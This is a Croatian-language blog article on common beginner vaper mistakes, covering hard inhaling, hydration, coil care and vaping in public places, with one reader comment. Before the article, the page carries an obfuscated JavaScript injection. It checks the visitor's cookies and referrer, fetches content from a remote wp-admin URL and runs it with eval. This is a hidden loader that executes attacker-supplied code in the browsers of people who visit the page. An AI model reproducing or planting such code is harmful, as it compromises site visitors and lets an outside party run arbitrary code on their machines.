;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Nekoliko čestih pogrešaka vapera početnika

Istina je da je vaping sigurniji od pušenja, ali postoje neki detalji vezani uz korištenje uređaja koji vaping automatski čine kompliciranijim od jednostavnog povlačenja dima cigarete. Na tržištu su dostupni različiti uređaji za vaping. Svaki pojedinac ima različite izbore, a odabire komplete po vlastitom izboru. Novi vaperi mogu koristiti početne setove jer ih mogu lako koristiti bez previše razmišljanja o postavkama. S druge strane, postoji i ogroman izbor naprednijih uređaja i setova koje uglavnom preferiraju oni koji su već koliko toliko upoznati s vapingom.

Kada počnete nešto novo, normalno je činiti greške. Isti je slučaj i s e-cigaretama. Novi vaperi griješe jer ne znaju kako se nositi sa složenošću uređaja. Evo nekoliko osnovnih pogrešaka koje često vidimo kod novih vapera:

Prejako udisanje

Ukoliko ste nekada dali nekom prijatelju pušaču da proba vašu e-cigaretu, vjerojatno već znate da je prvobitna reakcija na paru jak kašalj. Naravno, problem je u nepravilnom udisanju, pogotovo ukoliko osoba ne očekuje toliku količinu pare koliku mnogi uređaju mogu proizvesti.

Prejako udisanje uobičajena je pogreška; svaki novi vaper to radi. Ako ste bivši pušač, a sada parite, možete se suočiti s ovim problemom. Obično, kada pušite tradicionalnu cigaretu, snažno povlačite dimove, pa to činite i kada koristite vape uređaj.

Neki vaperi misle da mogu proizvesti više pare ako snažno udahnu, ali to nije točno. Možete proizvesti više pare ako uvlačite duže, a ne jače. Dakle, jaki udisaji mogu oštetiti zavojnicu u vašem vape uređaju, a neće dati nikakav koristan rezultat.

Nedovoljna hidratacija organizma

Održavanje hidratacije dobro je za vaše zdravlje, ali većina vapera to ne shvaća ozbiljno. Vaperi se mogu suočiti s problemom dehidracije zbog konzumacija PG/VG-a. Obje ove tvari su higroskopne i imaju sposobnost upijanja vlage iz okoline. Iz istog razloga možete osjetiti suhoću u ustima ili grlu. Dakle, ako ste vaper, trebate piti puno vode da ostanete hidrirani.

Neredovito čišćenje uređaja i mijenjanje grijača

Većina novih vapera počinje pariti odmah nakon ponovnog punjenja spremnika, što nije dobro. Pamučnom fitilju treba vremena da se zasiti, a ako počnete povlačiti paru prije nego što je vata dobro natopljena, vrlo lako može pregorjeti.

Nijedna zavojnica nije trajna u vašem uređaju i potrebno ju je promijeniti za dobro iskustvo vapinga. Kada se okus u vapeu promijeni, a pamučni fitilj postane tamniji, trebate promijeniti zavojnicu. Ukoliko koristite kupovne grijače u kojima je teško vidjeti vatu, obratite pažnju na performans uređaja. Izlazi li ista količina pare kao ranije? Je li ukus sada drugačiji? Osjećate li miris zagorjelog? Ako je išta od ovoga točno, vrijeme je da se promijeni grijač.

Ipak, prije nego što jednostavno zamijenite staru zavojnicu novom, nemojte zaboraviti očistiti vaš atomizer. Bit ćete iznenađeni koliko se naslaga stvori u kratkom roku i postat će vam jasno zašto je redovno čišćenje uređaja važno.

Parenje tamo gdje pušenje nije dozvoljeno

Prema našim zakonima, parenje je jednako pušenju kada je u pitanju korištenje e-cigareta na javnim mjestima. Ukoliko izbacujete oblake pare u zatvorenim prostorima ili u nečije lice, stvarate problem čitavoj zajednici vapera koja je već ionako na relativno lošem glasu zbog godina i godina negativne propagande u medijima. Imajte to na umu kada sljedeći put poželite uzeti puff tijekom vožnje gradskim autobusom ili čekaonici bolnice.

Choose your Reaction!
  • Jedan od boljih članaka za početnike u zadnje vrijeme. Pogotovo dijelovi koji se tiču jačine uvlačenja i mjesta na kojima se ne smije pariti. Što se početničkih grešaka tiče, svi smo ih prošli :) uvijek se sjetim svake osobe, pušača, kojem bi dao da proba svoju staru Spinner olovčicu i njihovog zakašljavanja jer bi povukli “ko sivonje” :)

Leave a Comment